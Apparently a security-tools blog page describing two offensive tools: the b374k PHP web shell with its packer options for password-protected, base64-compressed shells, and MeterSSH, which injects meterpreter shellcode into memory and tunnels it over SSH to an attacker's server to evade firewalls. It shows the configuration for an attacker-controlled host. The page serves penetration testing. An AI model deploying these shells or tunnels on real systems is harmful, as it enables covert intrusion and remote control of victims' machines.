  • Support PHP > 4.3.3 and PHP 5

Requirements:

  • PHP version > 4.3.3 and PHP 5
  • As it using zepto.js v1.1.2, you need modern browser to use b374k shell. See browser support on zepto.js website http://zeptojs.com/
  • Responsibility of what you do with this shell

Installation:

Download b374k.php (default password : b374k), edit and change password and upload b374k.php to your server, password is in sha1(md5()) format. Or create your own b374k.php, explained below

Customize:

After finished doing editing with files, upload index.php, base, module, theme and all files inside it to a server

Using Web Browser :

Open index.php in your browser, quick run will only run the shell. Use packer to pack all files into single PHP file. Set all the options available and the output file will be in the same directory as index.php

Using Console :

$ php -f index.php
b374k shell packer 0.4

options :
        -o filename                             save as filename
        -p password                             protect with password
        -t theme                                theme to use
        -m modules                              modules to pack separated by comma
        -s                                      strip comments and whitespaces
        -b                                      encode with base64
        -z [no|gzdeflate|gzencode|gzcompress]   compression (use only with -b)
        -c [0-9]                                level of compression
        -l                                      list available modules
        -k                                      list available themes

example :

$ php -f index.php -- -o myShell.php -p myPassword -s -b -z gzcompress -c 9

Don’t forget to delete index.php, base, module, theme and all files inside it after you finished. Because it is not protected with password so it can be a security threat to your server

More information can be found at: https://github.com/b374k/b374k

MeterSSH – Meterpreter over SSH


MeterSSH – Meterpreter over SSH

As penetration testers, it’s crucial to identify what types of attacks are detected and what’s not. After running into a recent penetration test with a next generation firewall, most analysis has shifted away from the endpoints and more towards network analysis. While there needs to be a mixture of both, MeterSSH demonstrates how easy it is to circumvent a lot of these signature based “next generation” product lines.

meterssh_3

MeterSSH is a way to take shellcode, inject it into memory then tunnel whatever port you want to over SSH to mask any type of communications as a normal SSH connection. The way it works is by injecting shellcode into memory, then wrapping a port spawned (meterpeter in this case) by the shellcode over SSH back to the attackers machine. Then connecting with meterpreter’s listener to localhost will communicate through the SSH proxy, to the victim through the SSH tunnel. All communications are relayed through the SSH tunnel and not through the network.

MeterSSH is an easy way to inject native shellcode into memory and pipe anything over SSH to the attacker machine through an SSH tunnel and all self contained into one single Python file. Python can easily be converted to an executable using pyinstaller or py2exe.

Features

  1. Meterpreter over SSH
  2. Ability to configure different IP’s, addresses, etc. without the need to ever change the shellcode.
  3. Monitor for the SSH connection and automatically spawn the shell

Usage

MeterSSH is easy – simply edit the meterssh.py file and add your SSH server IP, port, username, and password and run the script. It will spawn meterpreter through memory injection (in this case a windows/meterpreter/bind_tcp) and bind to port 8021. Paramiko (python SSH module) is used to tunnel meterpreter over 8021 and back to the attacker and all communications tucked within that SSH tunnel.

There are two files, monitor.py and meterssh.py.

  • monitor.py – run this in order to listen for an SSH connection, it will poll for 8021 on localhost for an SSH tunnel then spawn Metasploit for you automatically to grab the shell.
  • meterssh.py – this is what you would deploy to the victim machine – note that most windows machines wont have Python installed, its recommended to compile Python with py2exe or pyinstaller.

There are two files, monitor.py and meterssh.py.

Fields you need to edit inside meterssh.py

user = "sshuser"
# password for SSH
password = "sshpw"
# this is where your SSH server is running
rhost = "192.168.1.1"
# remote SSH port - this is the attackers SSH server
port = "22"
  • user – this is the user account for the attackers SSH server (do not use root, does not need root)
  • password – this is the password for the attackers SSH server
  • rhost – this is the attackers SSH server IP address
  • port – this is the attackers SSH server port

Note that you DO NOT need to change the Metasploit shellcode, the Metasploit shellcode is simply an unmodified windows/meterpreter/bind_tcp that binds to port 8021. If you want to change this, just switch the shellcode out and change port 8021 inside the script to bind to whatever port you want to. You do not need to do this however unless you want to customize/modify.

More information can be found at: https://github.com/trustedsec/meterssh